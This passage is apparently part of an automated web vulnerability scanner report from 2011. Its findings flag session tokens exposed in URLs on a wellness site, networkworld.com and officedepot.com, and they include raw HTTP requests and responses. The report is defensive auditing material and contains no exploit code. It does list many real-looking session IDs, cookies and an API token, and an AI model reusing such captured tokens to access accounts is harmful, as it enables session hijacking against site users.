<a href="/tag/dalai-lama.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">dalai lama (21)</a><br/>


<a href="/tag/dan-barber.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">dan barber (5)</a><br/>


<a href="/tag/david-lynch.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">david lynch (14)</a><br/>


<a href="/tag/deepak-chopra.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">deepak chopra (14)</a><br/>


<a href="/tag/detox.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">detox (19)</a><br/>


<a href="/tag/eco-fashion.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">eco-fashion (49)</a><br/>


<a href="/tag/eco-travel.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">eco-travel (58)</a><br/>


<a href="/tag/feng-shui-tips.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">feng shui tips (31)</a><br/>


<a href="/tag/fitness.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">fitness (197)</a><br/>


<a href="/tag/food.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">food (372)</a><br/>


<a href="/tag/food-trucks.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">food trucks (4)</a><br/>


<a href="/tag/gift-guide.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">gift guide (18)</a><br/>


<a href="/tag/gisele-bundchen.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">gisele bundchen (16)</a><br/>


<a href="/tag/goal-setting.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">goal setting (14)</a><br/>


<a href="/tag/grocery-shopping.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">grocery shopping (97)</a><br/>


<a href="/tag/gwyneth-paltrow.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">gwyneth paltrow (12)</a><br/>


<a href="/tag/happiness.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">happiness (47)</a><br/>


<a href="/tag/healthy-foods.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">healthy foods (210)</a><br/>


<a href="/tag/healthy-recipes.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">healthy recipes (66)</a><br/>


<a href="/tag/hillary-biscay.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">hillary biscay (5)</a><br/>


<a href="/tag/home.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">home (78)</a><br/>


<a href="/tag/infographic.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">infographic (34)</a><br/>


<a href="/tag/inspiration.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">inspiration (117)</a><br/>


<a href="/tag/jamie-oliver.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">jamie oliver (14)</a><br/>


<a href="/tag/kathryn-budig.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">kathryn budig (12)</a><br/>


<a href="/tag/kindness.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">kindness (24)</a><br/>


<a href="/tag/kombucha.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">kombucha (18)</a><br/>


<a href="/tag/link-love.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">link love (92)</a><br/>


<a href="/tag/los-angeles.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">los angeles (87)</a><br/>


<a href="/tag/madonna.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">madonna (11)</a><br/>


<a href="/tag/meditation.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">meditation (93)</a><br/>


<a href="/tag/michael-pollan.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">michael pollan (16)</a><br/>


<a href="/tag/michael-taylor.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">michael taylor (88)</a>
...[SNIP]...
<div style="float:right;width:147px;padding-right:2px"><a href="/tag/mind-body-connection.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">mind body connection (79)</a><br/>


<a href="/tag/mindfulness-meditation.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">mindfulness meditation (64)</a><br/>


<a href="/tag/new-york-city.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">new york city (174)</a><br/>


<a href="/tag/oprah.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">oprah (14)</a><br/>


<a href="/tag/organic-food.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">organic food (108)</a><br/>


<a href="/tag/partnered-posts.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">partnered posts (13)</a><br/>


<a href="/tag/paulo-coelho.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">paulo coelho (5)</a><br/>


<a href="/tag/personal-growth.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">personal growth (284)</a><br/>


<a href="/tag/personal-growth-quotes.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">personal growth quotes (165)</a><br/>


<a href="/tag/PETA.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">PETA (23)</a><br/>


<a href="/tag/pilates.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">pilates (38)</a><br/>


<a href="/tag/pro-athletes.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">pro athletes (44)</a><br/>


<a href="/tag/product-reviews.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">product reviews (43)</a><br/>


<a href="/tag/quizzes.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">quizzes (5)</a><br/>


<a href="/tag/relationships.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">relationships (38)</a><br/>


<a href="/tag/restaurants.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">restaurants (70)</a><br/>


<a href="/tag/retreats.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">retreats (9)</a><br/>


<a href="/tag/running.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">running (17)</a><br/>


<a href="/tag/russell-simmons.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">russell simmons (7)</a><br/>


<a href="/tag/san-francisco.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">san francisco (42)</a><br/>


<a href="/tag/sleeping.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">sleeping (17)</a><br/>


<a href="/tag/slideshows.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">slideshows (6)</a><br/>


<a href="/tag/spirituality.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">spirituality (199)</a><br/>


<a href="/tag/study.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">study (105)</a><br/>


<a href="/tag/tara-stiles.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">tara stiles (11)</a><br/>


<a href="/tag/TED.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">TED (41)</a><br/>


<a href="/tag/tips.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">tips (52)</a><br/>


<a href="/tag/tony-robbins.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">tony robbins (5)</a><br/>


<a href="/tag/triathlon.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">triathlon (16)</a><br/>


<a href="/tag/vancouver-olympics.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">vancouver olympics (17)</a><br/>


<a href="/tag/vegan.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">vegan (104)</a><br/>


<a href="/tag/vegan-recipes.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">vegan recipes (19)</a><br/>


<a href="/tag/video.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">video (174)</a><br/>


<a href="/tag/visualization.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">visualization (43)</a><br/>


<a href="/tag/weekly-roundup.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">weekly roundup (44)</a><br/>


<a href="/tag/weight-loss-success.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">weight loss success (113)</a><br/>


<a href="/tag/wellness.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">wellness (210)</a><br/>


<a href="/tag/words-of-wisdom.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">words of wisdom (134)</a><br/>


<a href="/tag/yoga.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">yoga (306)</a><br/>


<a href="/tag/yoga-poses.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">yoga poses (93)</a><br/>


<a href="/tag/yoga-poses-moving.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">yoga poses moving (5)</a><br/>


<a href="/tag/yoga-poses-sequence.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">yoga poses sequence (2)</a><br/>


<a href="/tag/yoga-poses-video.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">yoga poses video (18)</a><br/>


<a href="/tag/yogis.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">yogis (47)</a>
...[SNIP]...
<a href="http://ny.mindbodygreen.com"><img src="/images/ny-banner-300x250.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a>
...[SNIP]...
<div class="image"><a href="/0-1446/The-Power-The-Secret-Sequel-24-Inspirational-Quotes-from-Rhonda-Byrnes-New-Book.html;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/features/thumbs/the-power-rhonda-byrne-the-secret-thumb.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a></div>
           <div class="title"><a href="/0-1446/The-Power-The-Secret-Sequel-24-Inspirational-Quotes-from-Rhonda-Byrnes-New-Book.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">'The Power' ('The Secret' Sequel): 24 Inspirational Quotes</a>
...[SNIP]...
<div class="image"><a href="/0-1530/Q-A-with-Seane-Corn-On-Yoga-Giving-Back.html;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/features/thumbs/seane-corn-art-shot-thumb.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a></div>
           <div class="title"><a href="/0-1530/Q-A-with-Seane-Corn-On-Yoga-Giving-Back.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">Q & A with Seane Corn: On Yoga & Giving Back</a>
...[SNIP]...
<div class="image"><a href="/0-1500/Men-and-Yoga-What-Inspired-Yogis-to-Hit-the-Mat.html;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/features/thumbs/Vinnie-THUMB.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a></div>
           <div class="title"><a href="/0-1500/Men-and-Yoga-What-Inspired-Yogis-to-Hit-the-Mat.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">Men and Yoga: What Inspired Yogis to Hit the Mat</a>
...[SNIP]...
<div class="image"><a href="/0-91/The-7-Chakras-for-Beginners.html;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/features/thumbs/7-chakras-beginners.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a></div>
           <div class="title"><a href="/0-91/The-7-Chakras-for-Beginners.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">The 7 Chakras for Beginners</a>
...[SNIP]...
<div class="image"><a href="/0-1683/6-Ways-to-Detox-Through-Your-Skin.html;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/features/thumbs/Jess-Ainscough-wellness-thumb.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a></div>
           <div class="title"><a href="/0-1683/6-Ways-to-Detox-Through-Your-Skin.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">6 Ways to Detox Through Your Skin</a>
...[SNIP]...
<div class="image"><a href="/0-1792/8-Steps-to-Finding-Your-Middle-Path-for-the-New-Year-Extremes-Begone.html;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/features/thumbs/McLeanMcGown_thumb.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a></div>
           <div class="title"><a href="/0-1792/8-Steps-to-Finding-Your-Middle-Path-for-the-New-Year-Extremes-Begone.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">8 Steps to Finding Your Middle Path: Extremes Begone!</a>
...[SNIP]...
<div class="image"><a href="/0-1024/Q-A-with-Kris-Carr-Crazy-Sexy-Inspirational-Wellness-Rock-Star.html;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/features/thumbs/KrisCarr1-thumb.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a></div>
           <div class="title"><a href="/0-1024/Q-A-with-Kris-Carr-Crazy-Sexy-Inspirational-Wellness-Rock-Star.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">Q & A with Kris Carr: Crazy Sexy Wellness</a>
...[SNIP]...
<div class="image"><a href="/0-1115/The-3-Ps-of-Optimism.html;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/features/thumbs/brian-johnson-wellness-thumb.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a></div>
           <div class="title"><a href="/0-1115/The-3-Ps-of-Optimism.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">The 3 P's of Optimism</a>
...[SNIP]...
<div class="image"><a href="/0-947/Yoga-Poses-for-the-Core-Howto-Tips-Benefits-Images-Videos.html;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/features/thumbs/yoga-poses-core-preview-9-ways-lose-weight-thumb.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a></div>
           <div class="title"><a href="/0-947/Yoga-Poses-for-the-Core-Howto-Tips-Benefits-Images-Videos.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">Yoga Poses for Your Core</a>
...[SNIP]...
<div class="image"><a href="/0-1452/Barre3-Review-Better-Workout-for-Better-Posture.html;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/features/barre-3-review-preview.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a></div>
           <div class="title"><a href="/0-1452/Barre3-Review-Better-Workout-for-Better-Posture.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">Barre3 Review: Better Workout for Better Posture</a>
...[SNIP]...
<div class="image"><a href="/0-1835/Breathe-Your-Way-to-an-Open-Heart.html;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/features/heart-chakra.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a></div>
           <div class="title"><a href="/0-1835/Breathe-Your-Way-to-an-Open-Heart.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">Breathe Your Way to an Open Heart</a>
...[SNIP]...
<div class="image"><a href="/0-787/Q-A-with-Melissa-Etheridge-On-Yoga-Books-More.html;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/features/preface-banner_melissa_preview.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a></div>
           <div class="title"><a href="/0-787/Q-A-with-Melissa-Etheridge-On-Yoga-Books-More.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">Q & A with Melissa Etheridge: Yoga, Books & More</a>
...[SNIP]...
<div id="footer">


<a href="/;jsessionid=411392370C2802E8CD928A39CCA58AA0" class="footer2">Home</a> | <a href="/about.jsp;jsessionid=411392370C2802E8CD928A39CCA58AA0" class="footer2">About</a> | <a href="/contactus.jsp;jsessionid=411392370C2802E8CD928A39CCA58AA0" class="footer2">Contact</a> | <a href="/contactus.jsp;jsessionid=411392370C2802E8CD928A39CCA58AA0?t=help" class="footer2">Help</a>
...[SNIP]...
</p>
<a href="/termsofuse.jsp;jsessionid=411392370C2802E8CD928A39CCA58AA0" class="footer2">Terms
of Use</a> | <a href="/privacy.jsp;jsessionid=411392370C2802E8CD928A39CCA58AA0" class="footer2">Privacy
Policy</a> | <a href="/disclaimer.jsp;jsessionid=411392370C2802E8CD928A39CCA58AA0" class="footer2">Disclaimer</a>
...[SNIP]...

9.82. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.networkworld.com
Path:   /community/blog/ebay-use-joomla-open-source-glue

Issue detail

The response contains the following links that appear to contain session tokens:
  • http://api.demandbase.com/api/v1/ip.json?token=beebedc26d45cee0d855facb1672946527973cfd&callback=OPG.Demandbase.dbase_parse

Request

GET /community/blog/ebay-use-joomla-open-source-glue HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Cneonction: close
Content-Type: text/html; charset=utf-8
Expires: Tue, 25 Jan 2011 05:03:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 05:03:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=173.193.214.243.1295931833340495; path=/; expires=Thu, 24-Jan-13 05:03:53 GMT
Set-Cookie: SESSa27dc0841fd4d8567c009be96a283c67=cl3ko5pm3b3hr81s3vr2lv1nc2; expires=Thu, 17-Feb-2011 08:37:13 GMT; path=/; domain=.networkworld.com
Content-Length: 95231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns = "http://www.w3.org/1999/xhtml" xml:lang = "en" lang = "en">
<head
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=beebedc26d45cee0d855facb1672946527973cfd&callback=OPG.Demandbase.dbase_parse"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=beebedc26d45cee0d855facb1672946527973cfd&callback=OPG.Demandbase.dbase_parse"></script>
...[SNIP]...

9.83. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.networkworld.com
Path:   /news/2010/100710-ebay-deploys-joomla-for-analytics.html

Issue detail

The response contains the following links that appear to contain session tokens:
  • http://api.demandbase.com/api/v1/ip.json?token=beebedc26d45cee0d855facb1672946527973cfd&callback=OPG.Demandbase.dbase_parse

Request

GET /news/2010/100710-ebay-deploys-joomla-for-analytics.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=300
Date: Tue, 25 Jan 2011 05:03:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=beebedc26d45cee0d855facb1672946527973cfd&callback=OPG.Demandbase.dbase_parse"></script>
...[SNIP]...

9.84. http://www.officedepot.com/promo.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.officedepot.com
Path:   /promo.do

Issue detail

The response contains the following links that appear to contain session tokens:
  • http://www.officedepot.com/a/browse/monitors/N=5+509676/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/network-services/N=5+509887/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/networking-and-cables/N=5+509688/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/office-chairs/N=5+501507/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/office-depot-brand-products/N=5+422825/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/office-machines/N=5+509740/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/office-supplies/N=5+1676/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/panel-and-cubicle-systems/N=5+501895/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/paper-forms-envelopes/N=5+4072/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/paper-products-and-dispensers/N=5+2602/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/pencils/N=5+4504/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/pens-pencils-and-markers/N=5+4367/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/pens/N=5+4520/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/phones-and-accessories/N=5+509793/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/portable-flash-drives/N=5+509664/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/power-protection-and-batteries/N=5+509475/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/powersurge-protectors/N=5+509579/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/printers-scanners-copiers-faxes/N=5+509833/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/projectors/N=5+509684/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/promotional-products/N=5+4581/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/property-damage-solutions/N=5+319645/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/reception-seating/N=5+501516/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/repair-upgrade-services/N=5+509889/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/safes/N=5+501903/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/school-supplies/N=5+502600/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/security-solutions/N=5+8612/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/self-stick-notes-and-flags/N=5+6188/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/servers/N=5+510989/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/shredders/N=5+509777/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/small-officehome-office-desks/N=5+501556/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/software-and-books/N=5+509895/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/solutions-for-prevention-of-online-threats/N=5+510451/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/specialty-desking/N=5+501568/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/specialty-filesstorage/N=5+501578/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/stamps-and-daters/N=5+3034/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/staplers-staples-and-removers/N=5+2113/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/stationery/N=5+2930+378259/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/storage--files-boxes-and-more/N=5+3733/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/tables/N=5+501910/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/tablet-pcs/N=5+509621/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/tape-and-adhesives/N=5+371557/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/teacher-and-classroom-supplies/N=5+502674/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/technology/N=5+9021/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/tv-carts-and-stands/N=5+501488/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/utility-and-book-carts/N=5+501491/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/vertical-file-cabinets/N=5+501584/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/wall-units/N=5+501439/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/warranties-and-services/N=5+509880/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/webcams/N=5+509587/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/wide-format-printers/N=5+509875/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/wood-bookcases/N=5+483123/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/wood-veneer-furniture-collections/N=5+501822/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/browse/your-greener-office/N=5+11332/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/business-resource-center/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/catalog-request/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/design-print-and-ship/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/ink-toner-and-ribbons/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/promo/pages/0711_mobile/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/promo/pages/0928_tech/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/site-map/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/a/top-categories/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/account/alertsDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/account/myAccountDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
  • http://www.officedepot.com/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=10206&redirect=false
  • http://www.officedepot.com/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=10207&redirect=false
  • http://www.officedepot.com/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=12157&redirect=false
  • http://www.officedepot.com/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=15028&redirect=false
  • http://www.officedepot.com/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=15030&redirect=false
  • http://www.officedepot.com/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=15031&redirect=false
  • http://www.officedepot.com/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=15032&redirect=false
  • http://www.officedepot.com/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=15033&redirect=false
  • http://www.officedepot.com/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=15034&redirect=false
  • http://www.officedepot.com/ads/displayStoreAds.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?popup=true&redirect=false
